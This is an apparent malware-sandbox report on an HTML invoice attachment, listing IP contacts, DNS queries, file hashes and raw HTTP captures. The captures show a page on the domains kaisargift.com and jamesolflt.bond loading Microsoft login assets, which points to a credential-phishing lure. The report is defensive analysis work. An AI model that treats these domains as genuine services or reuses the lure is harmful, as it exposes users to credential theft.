Source: file:///C:/Users/user/Desktop/Invoice%20Confirmation%20Subscription_2EZHMA9.htm	HTTP Parser: No <meta name="copyright".. found
Source: file:///C:/Users/user/Desktop/Invoice%20Confirmation%20Subscription_2EZHMA9.htm	HTTP Parser: No <meta name="copyright".. found

Source: Joe Sandbox View	IP Address: 104.17.24.14 104.17.24.14
Source: Joe Sandbox View	IP Address: 23.209.72.9 23.209.72.9
Source: Joe Sandbox View	IP Address: 40.126.28.19 40.126.28.19
Source: Joe Sandbox View	IP Address: 40.97.4.1 40.97.4.1

Source: unknown	TCP traffic detected without corresponding DNS query: 2.23.227.208
Source: unknown	TCP traffic detected without corresponding DNS query: 2.23.227.215
Source: unknown	TCP traffic detected without corresponding DNS query: 2.19.104.63
Source: unknown	TCP traffic detected without corresponding DNS query: 2.23.73.143
Source: unknown	TCP traffic detected without corresponding DNS query: 2.23.227.208
Source: unknown	TCP traffic detected without corresponding DNS query: 2.23.227.215
Source: unknown	TCP traffic detected without corresponding DNS query: 142.250.81.227
Source: unknown	TCP traffic detected without corresponding DNS query: 142.250.81.227
Source: unknown	TCP traffic detected without corresponding DNS query: 142.250.81.227
Source: unknown	TCP traffic detected without corresponding DNS query: 142.250.81.227
Source: unknown	TCP traffic detected without corresponding DNS query: 142.250.81.227
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 52.182.141.63
Source: unknown	TCP traffic detected without corresponding DNS query: 52.182.141.63
Source: unknown	TCP traffic detected without corresponding DNS query: 2.17.190.73
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 52.182.141.63
Source: unknown	TCP traffic detected without corresponding DNS query: 2.17.190.73
Source: unknown	TCP traffic detected without corresponding DNS query: 2.17.190.73
Source: unknown	TCP traffic detected without corresponding DNS query: 52.182.141.63
Source: unknown	TCP traffic detected without corresponding DNS query: 2.17.190.73
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 52.182.141.63
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 2.17.190.73
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 52.182.141.63
Source: unknown	TCP traffic detected without corresponding DNS query: 2.17.190.73
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 52.182.141.63
Source: unknown	TCP traffic detected without corresponding DNS query: 2.17.190.73
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 142.250.81.227
Source: unknown	TCP traffic detected without corresponding DNS query: 142.250.81.227
Source: unknown	TCP traffic detected without corresponding DNS query: 2.23.227.208
Source: unknown	TCP traffic detected without corresponding DNS query: 2.23.227.208
Source: unknown	TCP traffic detected without corresponding DNS query: 2.23.227.208
Source: unknown	TCP traffic detected without corresponding DNS query: 2.23.227.208
Source: unknown	TCP traffic detected without corresponding DNS query: 2.23.227.208
Source: unknown	TCP traffic detected without corresponding DNS query: 2.23.227.208
Source: unknown	TCP traffic detected without corresponding DNS query: 2.23.227.208
Source: unknown	TCP traffic detected without corresponding DNS query: 2.23.227.208
Source: unknown	TCP traffic detected without corresponding DNS query: 2.23.227.208

Source: global traffic	DNS traffic detected: DNS query: www.google.com
Source: global traffic	DNS traffic detected: DNS query: 7b6fzcwcqmmd8xoz5.kaisargift.com
Source: global traffic	DNS traffic detected: DNS query: _8443._https.7b6fzcwcqmmd8xoz5.kaisargift.com
Source: global traffic	DNS traffic detected: DNS query: aadcdn.msftauth.net
Source: global traffic	DNS traffic detected: DNS query: code.jquery.com
Source: global traffic	DNS traffic detected: DNS query: cdnjs.cloudflare.com
Source: global traffic	DNS traffic detected: DNS query: maxcdn.bootstrapcdn.com
Source: global traffic	DNS traffic detected: DNS query: erfectries.jamesolflt.bond
Source: global traffic	DNS traffic detected: DNS query: outlook.office.com
Source: global traffic	DNS traffic detected: DNS query: login.microsoftonline.com

File type:	HTML document, ASCII text, with CRLF line terminators
Entropy (8bit):	4.355169919469262
TrID:	HyperText Markup Language with DOCTYPE (12503/2) 17.73% HyperText Markup Language (12001/1) 17.02% HyperText Markup Language (12001/1) 17.02% HyperText Markup Language (11501/1) 16.31% HyperText Markup Language (11501/1) 16.31%
File name:	Invoice Confirmation Subscription_2EZHMA9.htm
File size:	9'827 bytes
MD5:	7493da1f3f66726d6d2cf9ee1bb238c1
SHA1:	77c042eb7f7dc704b5136e23526aacef7ac3eb61
SHA256:	cd4354fa0e43b6ab3f8550b3c5703f72475bbd13a94ed1027cbd1c2860df745d
SHA512:	c138f9123cb0c2bac0e2298ec8b2822fd411aa4117961955232397700f9704289fb27c6195cea6103853f5541fe07596670fa1856ebf3157f3856dd84de6c992
SSDEEP:	192:S6yev8XA4sXgPAJHO9S7hQX4hjN7jODTs1OsU:SI8P4hNjODTs1OsU
TLSH:	72127529A94151025133D37C9BF25618FEB2411793078A697EFC624A8FF79448D93FEC
File Content Preview:	<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">..<html xmlns="http://www.w3.org/1999/xhtml" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:o="urn:schemas-microsoft-com:office:office"

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 2, 2025 15:01:45.577519894 CEST	53	60890	1.1.1.1	192.168.2.9
Apr 2, 2025 15:01:45.582190037 CEST	53	51527	1.1.1.1	192.168.2.9
Apr 2, 2025 15:01:46.554754019 CEST	53	55409	1.1.1.1	192.168.2.9
Apr 2, 2025 15:01:49.951409101 CEST	64033	53	192.168.2.9	1.1.1.1
Apr 2, 2025 15:01:49.951606035 CEST	51938	53	192.168.2.9	1.1.1.1
Apr 2, 2025 15:01:50.054862976 CEST	53	51938	1.1.1.1	192.168.2.9
Apr 2, 2025 15:01:50.055671930 CEST	53	64033	1.1.1.1	192.168.2.9
Apr 2, 2025 15:01:56.350239038 CEST	56668	53	192.168.2.9	1.1.1.1
Apr 2, 2025 15:01:56.350433111 CEST	61230	53	192.168.2.9	1.1.1.1
Apr 2, 2025 15:01:56.459655046 CEST	53	56668	1.1.1.1	192.168.2.9
Apr 2, 2025 15:01:56.460988045 CEST	53	61230	1.1.1.1	192.168.2.9
Apr 2, 2025 15:01:57.370762110 CEST	57442	53	192.168.2.9	1.1.1.1
Apr 2, 2025 15:01:57.370899916 CEST	59980	53	192.168.2.9	1.1.1.1
Apr 2, 2025 15:01:57.471429110 CEST	53	57442	1.1.1.1	192.168.2.9
Apr 2, 2025 15:01:57.472230911 CEST	53	59980	1.1.1.1	192.168.2.9
Apr 2, 2025 15:01:57.478262901 CEST	53	59345	1.1.1.1	192.168.2.9
Apr 2, 2025 15:01:57.574148893 CEST	53	64975	1.1.1.1	192.168.2.9
Apr 2, 2025 15:01:57.900631905 CEST	61979	53	192.168.2.9	1.1.1.1
Apr 2, 2025 15:01:57.900922060 CEST	53700	53	192.168.2.9	1.1.1.1
Apr 2, 2025 15:01:58.006855011 CEST	53	53700	1.1.1.1	192.168.2.9
Apr 2, 2025 15:01:58.009466887 CEST	53	61979	1.1.1.1	192.168.2.9
Apr 2, 2025 15:01:58.151326895 CEST	61594	53	192.168.2.9	1.1.1.1
Apr 2, 2025 15:01:58.151452065 CEST	61679	53	192.168.2.9	1.1.1.1
Apr 2, 2025 15:01:58.250366926 CEST	53	61679	1.1.1.1	192.168.2.9
Apr 2, 2025 15:01:58.250581980 CEST	53	61594	1.1.1.1	192.168.2.9
Apr 2, 2025 15:02:00.236274958 CEST	54325	53	192.168.2.9	1.1.1.1
Apr 2, 2025 15:02:00.236424923 CEST	64626	53	192.168.2.9	1.1.1.1
Apr 2, 2025 15:02:00.335542917 CEST	53	54325	1.1.1.1	192.168.2.9
Apr 2, 2025 15:02:00.337729931 CEST	53	64626	1.1.1.1	192.168.2.9
Apr 2, 2025 15:02:00.795751095 CEST	59661	53	192.168.2.9	1.1.1.1
Apr 2, 2025 15:02:00.795903921 CEST	50611	53	192.168.2.9	1.1.1.1
Apr 2, 2025 15:02:00.894042015 CEST	53	59661	1.1.1.1	192.168.2.9
Apr 2, 2025 15:02:00.894934893 CEST	53	50611	1.1.1.1	192.168.2.9
Apr 2, 2025 15:02:03.485599041 CEST	53	56289	1.1.1.1	192.168.2.9
Apr 2, 2025 15:02:15.021789074 CEST	56520	53	192.168.2.9	1.1.1.1
Apr 2, 2025 15:02:15.022167921 CEST	52074	53	192.168.2.9	1.1.1.1
Apr 2, 2025 15:02:15.145750046 CEST	53	56520	1.1.1.1	192.168.2.9
Apr 2, 2025 15:02:15.163743973 CEST	53	52074	1.1.1.1	192.168.2.9
Apr 2, 2025 15:02:16.221162081 CEST	62687	53	192.168.2.9	1.1.1.1
Apr 2, 2025 15:02:16.221512079 CEST	52528	53	192.168.2.9	1.1.1.1
Apr 2, 2025 15:02:16.347871065 CEST	53	62687	1.1.1.1	192.168.2.9
Apr 2, 2025 15:02:16.362519026 CEST	53	52528	1.1.1.1	192.168.2.9
Apr 2, 2025 15:02:22.428956985 CEST	53	63256	1.1.1.1	192.168.2.9
Apr 2, 2025 15:02:28.333125114 CEST	57071	53	192.168.2.9	1.1.1.1
Apr 2, 2025 15:02:28.333125114 CEST	63748	53	192.168.2.9	1.1.1.1
Apr 2, 2025 15:02:28.435700893 CEST	53	63748	1.1.1.1	192.168.2.9
Apr 2, 2025 15:02:28.442301035 CEST	53	57071	1.1.1.1	192.168.2.9
Apr 2, 2025 15:02:29.490601063 CEST	61940	53	192.168.2.9	1.1.1.1
Apr 2, 2025 15:02:29.490705013 CEST	58131	53	192.168.2.9	1.1.1.1
Apr 2, 2025 15:02:29.592823982 CEST	53	58131	1.1.1.1	192.168.2.9
Apr 2, 2025 15:02:29.595755100 CEST	53	61940	1.1.1.1	192.168.2.9
Apr 2, 2025 15:02:44.837402105 CEST	53	55812	1.1.1.1	192.168.2.9
Apr 2, 2025 15:02:45.330912113 CEST	53	64866	1.1.1.1	192.168.2.9
Apr 2, 2025 15:02:48.401602030 CEST	53	56507	1.1.1.1	192.168.2.9
Apr 2, 2025 15:02:54.904417038 CEST	54912	53	192.168.2.9	1.1.1.1
Apr 2, 2025 15:02:54.904623032 CEST	63009	53	192.168.2.9	1.1.1.1
Apr 2, 2025 15:02:55.004004955 CEST	53	63009	1.1.1.1	192.168.2.9
Apr 2, 2025 15:02:55.004220009 CEST	53	54912	1.1.1.1	192.168.2.9
Apr 2, 2025 15:03:15.442342043 CEST	53	64053	1.1.1.1	192.168.2.9
Apr 2, 2025 15:03:17.847199917 CEST	138	138	192.168.2.9	192.168.2.255
Apr 2, 2025 15:04:01.706523895 CEST	53	54315	1.1.1.1	192.168.2.9

Timestamp	Bytes transferred	Direction	Data
Apr 2, 2025 15:01:58.332452059 CEST	202	OUT	GET /r/gsr1.crl HTTP/1.1 Cache-Control: max-age = 3000 Connection: Keep-Alive Accept: / If-Modified-Since: Tue, 07 Jan 2025 07:28:00 GMT User-Agent: Microsoft-CryptoAPI/10.0 Host: c.pki.goog
Apr 2, 2025 15:01:58.427062988 CEST	223	IN	HTTP/1.1 304 Not Modified Date: Wed, 02 Apr 2025 12:12:01 GMT Expires: Wed, 02 Apr 2025 13:02:01 GMT Age: 2997 Last-Modified: Tue, 07 Jan 2025 07:28:00 GMT Cache-Control: public, max-age=3000 Vary: Accept-Encoding
Apr 2, 2025 15:01:58.454473019 CEST	200	OUT	GET /r/r4.crl HTTP/1.1 Cache-Control: max-age = 3000 Connection: Keep-Alive Accept: / If-Modified-Since: Thu, 25 Jul 2024 14:48:00 GMT User-Agent: Microsoft-CryptoAPI/10.0 Host: c.pki.goog
Apr 2, 2025 15:01:58.546088934 CEST	223	IN	HTTP/1.1 304 Not Modified Date: Wed, 02 Apr 2025 12:12:01 GMT Expires: Wed, 02 Apr 2025 13:02:01 GMT Age: 2997 Last-Modified: Thu, 25 Jul 2024 14:48:00 GMT Cache-Control: public, max-age=3000 Vary: Accept-Encoding

Timestamp	Bytes transferred	Direction	Data
2025-04-02 13:01:57 UTC	673	OUT	GET /ests/2.1/content/cdnbundles/converged.v2.login.min_kfhrfyfy-sm2tmkm5ficcw2.css HTTP/1.1 Host: aadcdn.msftauth.net Connection: keep-alive sec-ch-ua-platform: "Windows" User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" sec-ch-ua-mobile: ?0 Accept: text/css,/;q=0.1 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: style Sec-Fetch-Storage-Access: active Referer: https://7b6fzcwcqmmd8xoz5.kaisargift.com:8443/ Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-04-02 13:01:57 UTC	645	IN	HTTP/1.1 200 OK Content-Type: text/css Content-MD5: 0O2H9juGYL0zkzcYWr0NIg== Last-Modified: Wed, 15 Jan 2025 17:48:42 GMT ETag: "0x8DD358CDA012529" x-ms-request-id: 78615c82-601e-0039-2d75-67afd2000000 x-ms-version: 2018-03-28 Access-Control-Expose-Headers: Accept-Ranges,Cache-Control,Content-Encoding,Content-Length,Content-MD5,Content-Type,Date,ETag,Last-Modified,Server,x-ms-request-id,x-ms-version Access-Control-Allow-Origin: * Cache-Control: public, max-age=24900407 Date: Wed, 02 Apr 2025 13:01:57 GMT Transfer-Encoding: chunked Connection: close Connection: Transfer-Encoding Akamai-GRN: 0.8904d217.1743598917.2fe0f80
2025-04-02 13:01:57 UTC	15739	IN	Data Raw: 30 30 30 30 36 30 30 30 0d 0a 2f 2a 21 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 2e 20 41 6c 6c 20 72 69 67 68 74 73 20 72 65 73 65 72 76 65 64 2e 20 2a 2f 2f 2a 21 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 20 53 54 41 52 54 20 4f 46 20 54 48 49 52 44 20 50 41 52 54 59 20 4e 4f 54 49 43 45 20 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 0a 0a 54 68 69 73 20 66 69 6c 65 20 69 73 20 62 61 73 65 64 20 6f 6e 20 6f 72 20 69 6e 63 6f 72 70 6f 72 61 74 65 73 20 6d 61 74 65 72 69 61 6c 20 66 72 6f 6d 20 74 68 65 20 70 72 6f 6a 65 63 Data Ascii: 00006000/! Copyright (C) Microsoft Corporation. All rights reserved. //*!------------------------------------------- START OF THIRD PARTY NOTICE -----------------------------------------This file is based on or incorporates material from the projec
2025-04-02 13:01:57 UTC	8849	IN	Data Raw: 6c 2d 6c 67 2d 31 31 2c 2e 63 6f 6c 2d 78 73 2d 31 32 2c 2e 63 6f 6c 2d 73 6d 2d 31 32 2c 2e 63 6f 6c 2d 6d 64 2d 31 32 2c 2e 63 6f 6c 2d 6c 67 2d 31 32 2c 2e 63 6f 6c 2d 78 73 2d 31 33 2c 2e 63 6f 6c 2d 73 6d 2d 31 33 2c 2e 63 6f 6c 2d 6d 64 2d 31 33 2c 2e 63 6f 6c 2d 6c 67 2d 31 33 2c 2e 63 6f 6c 2d 78 73 2d 31 34 2c 2e 63 6f 6c 2d 73 6d 2d 31 34 2c 2e 63 6f 6c 2d 6d 64 2d 31 34 2c 2e 63 6f 6c 2d 6c 67 2d 31 34 2c 2e 63 6f 6c 2d 78 73 2d 31 35 2c 2e 63 6f 6c 2d 73 6d 2d 31 35 2c 2e 63 6f 6c 2d 6d 64 2d 31 35 2c 2e 63 6f 6c 2d 6c 67 2d 31 35 2c 2e 63 6f 6c 2d 78 73 2d 31 36 2c 2e 63 6f 6c 2d 73 6d 2d 31 36 2c 2e 63 6f 6c 2d 6d 64 2d 31 36 2c 2e 63 6f 6c 2d 6c 67 2d 31 36 2c 2e 63 6f 6c 2d 78 73 2d 31 37 2c 2e 63 6f 6c 2d 73 6d 2d 31 37 2c 2e 63 6f 6c 2d Data Ascii: l-lg-11,.col-xs-12,.col-sm-12,.col-md-12,.col-lg-12,.col-xs-13,.col-sm-13,.col-md-13,.col-lg-13,.col-xs-14,.col-sm-14,.col-md-14,.col-lg-14,.col-xs-15,.col-sm-15,.col-md-15,.col-lg-15,.col-xs-16,.col-sm-16,.col-md-16,.col-lg-16,.col-xs-17,.col-sm-17,.col-
2025-04-02 13:01:58 UTC	16384	IN	Data Raw: 30 30 30 30 36 30 30 30 0d 0a 2d 6d 64 2d 70 75 73 68 2d 30 7b 6c 65 66 74 3a 61 75 74 6f 7d 2e 63 6f 6c 2d 6d 64 2d 70 75 73 68 2d 31 7b 6c 65 66 74 3a 34 2e 31 36 36 36 37 25 7d 2e 63 6f 6c 2d 6d 64 2d 70 75 73 68 2d 32 7b 6c 65 66 74 3a 38 2e 33 33 33 33 33 25 7d 2e 63 6f 6c 2d 6d 64 2d 70 75 73 68 2d 33 7b 6c 65 66 74 3a 31 32 2e 35 25 7d 2e 63 6f 6c 2d 6d 64 2d 70 75 73 68 2d 34 7b 6c 65 66 74 3a 31 36 2e 36 36 36 36 37 25 7d 2e 63 6f 6c 2d 6d 64 2d 70 75 73 68 2d 35 7b 6c 65 66 74 3a 32 30 2e 38 33 33 33 33 25 7d 2e 63 6f 6c 2d 6d 64 2d 70 75 73 68 2d 36 7b 6c 65 66 74 3a 32 35 25 7d 2e 63 6f 6c 2d 6d 64 2d 70 75 73 68 2d 37 7b 6c 65 66 74 3a 32 39 2e 31 36 36 36 37 25 7d 2e 63 6f 6c 2d 6d 64 2d 70 75 73 68 2d 38 7b 6c 65 66 74 3a 33 33 2e 33 33 33 Data Ascii: 00006000-md-push-0{left:auto}.col-md-push-1{left:4.16667%}.col-md-push-2{left:8.33333%}.col-md-push-3{left:12.5%}.col-md-push-4{left:16.66667%}.col-md-push-5{left:20.83333%}.col-md-push-6{left:25%}.col-md-push-7{left:29.16667%}.col-md-push-8{left:33.333
2025-04-02 13:01:58 UTC	8204	IN	Data Raw: 66 66 66 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 65 38 31 31 32 33 7d 69 6e 70 75 74 5b 74 79 70 65 3d 22 72 61 64 69 6f 22 5d 7b 77 69 64 74 68 3a 32 30 70 78 3b 68 65 69 67 68 74 3a 32 30 70 78 7d 69 6e 70 75 74 5b 74 79 70 65 3d 22 72 61 64 69 6f 22 5d 3a 3a 2d 6d 73 2d 63 68 65 63 6b 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 30 30 30 3b 62 6f 72 64 65 72 2d 73 74 79 6c 65 3a 73 6f 6c 69 64 3b 62 6f 72 64 65 72 2d 77 69 64 74 68 3a 32 70 78 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 36 29 7d 69 6e 70 75 74 5b 74 79 70 65 3d 22 72 61 64 69 6f 22 5d 3a 63 68 65 63 6b 65 64 3a 3a 2d 6d 73 2d 63 68 65 63 6b 7b 63 6f 6c 6f 72 3a 23 30 30 30 3b 62 6f 72 64 Data Ascii: fff;background-color:#e81123}input[type="radio"]{width:20px;height:20px}input[type="radio"]::-ms-check{background-color:#fff;color:#000;border-style:solid;border-width:2px;border-color:rgba(0,0,0,0.6)}input[type="radio"]:checked::-ms-check{color:#000;bord
2025-04-02 13:01:58 UTC	16384	IN	Data Raw: 30 30 30 30 34 30 30 30 0d 0a 77 2d 78 3a 61 75 74 6f 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 2e 30 31 25 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 35 33 39 70 78 29 7b 2e 74 61 62 6c 65 2d 72 65 73 70 6f 6e 73 69 76 65 7b 77 69 64 74 68 3a 31 30 30 25 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 35 70 78 3b 6f 76 65 72 66 6c 6f 77 2d 79 3a 68 69 64 64 65 6e 3b 2d 6d 73 2d 6f 76 65 72 66 6c 6f 77 2d 73 74 79 6c 65 3a 2d 6d 73 2d 61 75 74 6f 68 69 64 69 6e 67 2d 73 63 72 6f 6c 6c 62 61 72 7d 2e 74 61 62 6c 65 2d 72 65 73 70 6f 6e 73 69 76 65 3e 2e 74 61 62 6c 65 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 30 7d 2e 74 61 62 6c 65 2d 72 65 73 70 6f 6e 73 69 76 65 3e 2e 74 61 62 6c 65 3e 74 68 65 61 64 3e 74 72 Data Ascii: 00004000w-x:auto;min-height:.01%}@media screen and (max-width:539px){.table-responsive{width:100%;margin-bottom:15px;overflow-y:hidden;-ms-overflow-style:-ms-autohiding-scrollbar}.table-responsive>.table{margin-bottom:0}.table-responsive>.table>thead>tr
2025-04-02 13:01:58 UTC	12	IN	Data Raw: 4b 68 6d 65 72 20 55 49 22 2c 0d 0a Data Ascii: Khmer UI",
2025-04-02 13:01:58 UTC	16384	IN	Data Raw: 30 30 30 30 34 30 30 30 0d 0a 22 54 75 6e 67 61 22 2c 22 4c 61 6f 20 55 49 22 2c 22 52 61 61 76 69 22 2c 22 49 73 6b 6f 6f 6c 61 20 50 6f 74 61 22 2c 22 4c 61 74 68 61 22 2c 22 4c 65 65 6c 61 77 61 64 65 65 22 2c 22 4d 69 63 72 6f 73 6f 66 74 20 59 61 48 65 69 20 55 49 22 2c 22 4d 69 63 72 6f 73 6f 66 74 20 4a 68 65 6e 67 48 65 69 20 55 49 22 2c 22 4d 61 6c 67 75 6e 20 47 6f 74 68 69 63 22 2c 22 45 73 74 72 61 6e 67 65 6c 6f 20 45 64 65 73 73 61 22 2c 22 4d 69 63 72 6f 73 6f 66 74 20 48 69 6d 61 6c 61 79 61 22 2c 22 4d 69 63 72 6f 73 6f 66 74 20 4e 65 77 20 54 61 69 20 4c 75 65 22 2c 22 4d 69 63 72 6f 73 6f 66 74 20 50 68 61 67 73 50 61 22 2c 22 4d 69 63 72 6f 73 6f 66 74 20 54 61 69 20 4c 65 22 2c 22 4d 69 63 72 6f 73 6f 66 74 20 59 69 20 42 61 69 74 69 Data Ascii: 00004000"Tunga","Lao UI","Raavi","Iskoola Pota","Latha","Leelawadee","Microsoft YaHei UI","Microsoft JhengHei UI","Malgun Gothic","Estrangelo Edessa","Microsoft Himalaya","Microsoft New Tai Lue","Microsoft PhagsPa","Microsoft Tai Le","Microsoft Yi Baiti
2025-04-02 13:01:58 UTC	12	IN	Data Raw: 6e 2d 70 72 69 6d 61 72 79 2d 0d 0a Data Ascii: n-primary-
2025-04-02 13:01:58 UTC	16384	IN	Data Raw: 30 30 30 30 36 30 30 30 0d 0a 61 63 74 69 76 65 2c 2e 62 74 6e 2e 62 74 6e 2d 70 72 69 6d 61 72 79 3a 61 63 74 69 76 65 2c 62 75 74 74 6f 6e 2e 62 74 6e 2d 70 72 69 6d 61 72 79 3a 61 63 74 69 76 65 2c 69 6e 70 75 74 5b 74 79 70 65 3d 22 62 75 74 74 6f 6e 22 5d 2e 62 74 6e 2d 70 72 69 6d 61 72 79 3a 61 63 74 69 76 65 2c 69 6e 70 75 74 5b 74 79 70 65 3d 22 73 75 62 6d 69 74 22 5d 2e 62 74 6e 2d 70 72 69 6d 61 72 79 3a 61 63 74 69 76 65 2c 69 6e 70 75 74 5b 74 79 70 65 3d 22 72 65 73 65 74 22 5d 2e 62 74 6e 2d 70 72 69 6d 61 72 79 3a 61 63 74 69 76 65 7b 6f 75 74 6c 69 6e 65 3a 6e 6f 6e 65 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 2d 6d 73 2d 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 2e 39 38 29 3b 2d 77 65 62 6b 69 74 2d 74 72 Data Ascii: 00006000active,.btn.btn-primary:active,button.btn-primary:active,input[type="button"].btn-primary:active,input[type="submit"].btn-primary:active,input[type="reset"].btn-primary:active{outline:none;text-decoration:none;-ms-transform:scale(.98);-webkit-tr
2025-04-02 13:01:58 UTC	8204	IN	Data Raw: 70 6f 72 74 61 6e 74 7d 2e 64 72 6f 70 64 6f 77 6e 2d 74 6f 67 67 6c 65 2e 6d 65 6d 62 65 72 6e 61 6d 65 50 72 65 66 69 6c 6c 53 65 6c 65 63 74 3a 68 6f 76 65 72 2c 2e 6f 70 65 6e 20 2e 64 72 6f 70 64 6f 77 6e 2d 74 6f 67 67 6c 65 2e 6d 65 6d 62 65 72 6e 61 6d 65 50 72 65 66 69 6c 6c 53 65 6c 65 63 74 7b 62 6f 72 64 65 72 3a 31 70 78 20 73 6f 6c 69 64 20 23 30 30 37 38 64 37 3b 62 6f 72 64 65 72 2d 74 6f 70 2d 77 69 64 74 68 3a 30 3b 62 6f 72 64 65 72 2d 6c 65 66 74 2d 77 69 64 74 68 3a 30 3b 62 6f 72 64 65 72 2d 72 69 67 68 74 2d 77 69 64 74 68 3a 30 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 65 65 65 20 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 64 72 6f 70 64 6f 77 6e 2d 74 6f 67 67 6c 65 2e 6d 65 6d 62 65 72 6e 61 6d 65 50 72 65 66 69 6c 6c 53 Data Ascii: portant}.dropdown-toggle.membernamePrefillSelect:hover,.open .dropdown-toggle.membernamePrefillSelect{border:1px solid #0078d7;border-top-width:0;border-left-width:0;border-right-width:0;background-color:#eee !important}.dropdown-toggle.membernamePrefillS

Timestamp	Bytes transferred	Direction	Data
2025-04-02 13:01:57 UTC	718	OUT	GET /shared/1.0/content/images/microsoft_logo_ee5c8d9fb6248c938fd0dc19370e90bd.svg HTTP/1.1 Host: aadcdn.msftauth.net Connection: keep-alive sec-ch-ua-platform: "Windows" User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" sec-ch-ua-mobile: ?0 Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Sec-Fetch-Storage-Access: active Referer: https://7b6fzcwcqmmd8xoz5.kaisargift.com:8443/ Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-04-02 13:01:57 UTC	612	IN	HTTP/1.1 200 OK Content-Type: image/svg+xml Content-MD5: nzaLxFgP7ZB3dfMcaybWzw== Last-Modified: Wed, 15 Jan 2025 17:53:51 GMT ETag: "0x8DD358D925D93F3" x-ms-request-id: 8565df70-501e-00f7-7176-67abf5000000 x-ms-version: 2018-03-28 Access-Control-Expose-Headers: Accept-Ranges,Cache-Control,Content-Encoding,Content-Length,Content-MD5,Content-Type,Date,ETag,Last-Modified,Server,x-ms-request-id,x-ms-version Access-Control-Allow-Origin: * Cache-Control: public, max-age=24900669 Date: Wed, 02 Apr 2025 13:01:57 GMT Content-Length: 3651 Connection: close Akamai-GRN: 0.8904d217.1743598917.2fe0f86
2025-04-02 13:01:57 UTC	3651	IN	Data Raw: 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 31 30 38 22 20 68 65 69 67 68 74 3d 22 32 34 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 30 38 20 32 34 22 3e 3c 74 69 74 6c 65 3e 61 73 73 65 74 73 3c 2f 74 69 74 6c 65 3e 3c 70 61 74 68 20 64 3d 22 4d 34 34 2e 38 33 36 2c 34 2e 36 56 31 38 2e 34 68 2d 32 2e 34 56 37 2e 35 38 33 48 34 32 2e 34 4c 33 38 2e 31 31 39 2c 31 38 2e 34 48 33 36 2e 35 33 31 4c 33 32 2e 31 34 32 2c 37 2e 35 38 33 68 2d 2e 30 32 39 56 31 38 2e 34 48 32 39 2e 39 56 34 2e 36 68 33 2e 34 33 36 4c 33 37 2e 33 2c 31 34 2e 38 33 68 2e 30 35 38 4c 34 31 2e 35 34 35 2c 34 2e 36 5a 6d 32 2c 31 2e 30 34 39 61 31 2e 32 